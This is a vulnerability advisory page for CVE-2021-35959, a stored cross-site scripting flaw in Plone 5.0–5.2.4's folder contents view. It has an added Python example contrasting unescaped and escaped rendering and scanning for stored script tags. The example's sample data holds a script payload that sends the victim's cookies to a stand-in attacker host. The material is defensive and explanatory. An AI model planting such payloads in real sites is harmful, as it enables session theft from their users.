
CVE-2021-35959: Plone has stored XSS in folder contents

CVSS Score: 6.1 (CVSS v3.1)

Basic Information

EPSS Score: 0.65064%
Published: 5/24/2022
Updated: 10/18/2024
KEV Status: No
Technology: Python

Technical Details

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Package Name | Ecosystem | Vulnerable Versions | First Patched Version
plone | pip | >= 5.0, <= 5.2.4 | (not given on this page)

Vulnerability Intelligence

Root Cause Analysis (Miggo AI)

The vulnerability stems from missing output escaping in the folder contents view template. The advisory states that the XSS triggers when a folder whose description contains a SCRIPT tag is rendered in that view. Plone's folder contents view uses the listing.pt template (part of plone.app.content) to display item metadata, including descriptions. The template likely inserted the description with the TAL 'structure' keyword, or an equivalent unescaped rendering, so any HTML stored in the field was emitted verbatim into the page. The hotfix addressed this by escaping the field before rendering, which is consistent with the template rendering step being the vulnerable component. Two practical points follow from the advisory text: the payload is planted by an account with the Contributor role and executes in the browser of any editor who later opens the folder contents view (a stored, victim-side XSS, matching UI:R and S:C in the vector), and because the payload lives in content rather than in code, existing folder descriptions on a previously unpatched site should be reviewed as well as the template being fixed.
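The following is an added example, not Plone's code and not taken from the advisory or the hotfix. It is a minimal stand-in for the folder contents listing that renders each item's title and description two ways: first as a template using the TAL `structure` keyword would (raw HTML, the vulnerable behaviour described above), then with HTML escaping applied, which is the class of fix the page attributes to the hotfix. It also includes the clean-up check an administrator of a previously unpatched site would want, scanning stored descriptions for script tags. The item data is constructed inline, and the names `FolderItem`, `render_listing` and `find_stored_payloads` are this example's own, not Plone's.

```python
"""Added example (not Plone's own code): vulnerable vs. hardened rendering
of a folder-contents listing, plus a scan for already-stored payloads."""

import html
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class FolderItem:
    """Hypothetical stand-in for a content item shown in the listing."""
    title: str
    description: str


# Constructed sample data: an ordinary folder and one whose Description
# field was set by a contributor to a script payload.
SAMPLE_ITEMS = [
    FolderItem("Reports", "Quarterly reports for the team"),
    FolderItem(
        "News",
        '<script>document.location="https://attacker.example/?c="'
        "+document.cookie</script>",
    ),
]

ROW_TEMPLATE = "<tr><td>{title}</td><td>{description}</td></tr>"


def render_listing(items, escape_output: bool) -> str:
    """Render the listing rows as an HTML table.

    escape_output=False mirrors a template that inserts the field with
    TAL's `structure` keyword, i.e. without escaping: the stored payload
    is emitted as live markup (the vulnerable behaviour).
    escape_output=True mirrors the hardened form: both fields are
    HTML-escaped before insertion, so a SCRIPT tag is displayed as text.
    """
    rows = []
    for item in items:
        if escape_output:
            title = html.escape(item.title, quote=True)
            description = html.escape(item.description, quote=True)
        else:
            title, description = item.title, item.description
        rows.append(ROW_TEMPLATE.format(title=title, description=description))
    return "<table>" + "".join(rows) + "</table>"


# Case-insensitive match for an opening script tag, tolerating whitespace
# after '<', which is enough to flag stored payloads of the kind the
# advisory describes (it is a triage aid, not a sanitizer).
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def find_stored_payloads(items):
    """Return the titles of items whose description already holds a script tag.

    Patching the template stops the payload from executing, but the payload
    itself remains in the content; this is the check used to find and clean
    such items.
    """
    return [item.title for item in items if SCRIPT_TAG.search(item.description)]


if __name__ == "__main__":
    print("vulnerable rendering:\n", render_listing(SAMPLE_ITEMS, escape_output=False))
    print("hardened rendering:\n", render_listing(SAMPLE_ITEMS, escape_output=True))
    print("items needing clean-up:", find_stored_payloads(SAMPLE_ITEMS))
```

Run stand-alone, the vulnerable rendering contains the literal `<script>` element inside the table cell, the hardened rendering contains `&lt;script&gt;` instead, and the scan reports the "News" item as needing clean-up. The escaping is applied to every interpolated field, not just the one named in the advisory, because any field a contributor controls and a template inserts with `structure` has the same exposure.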


WAF Protection Rules

WAF Rule

In Plone 5.0 through 5.2.4, editors are vulnerable to XSS in the folder contents view, if a contributor has created a folder with a SCRIPT tag in the description field.
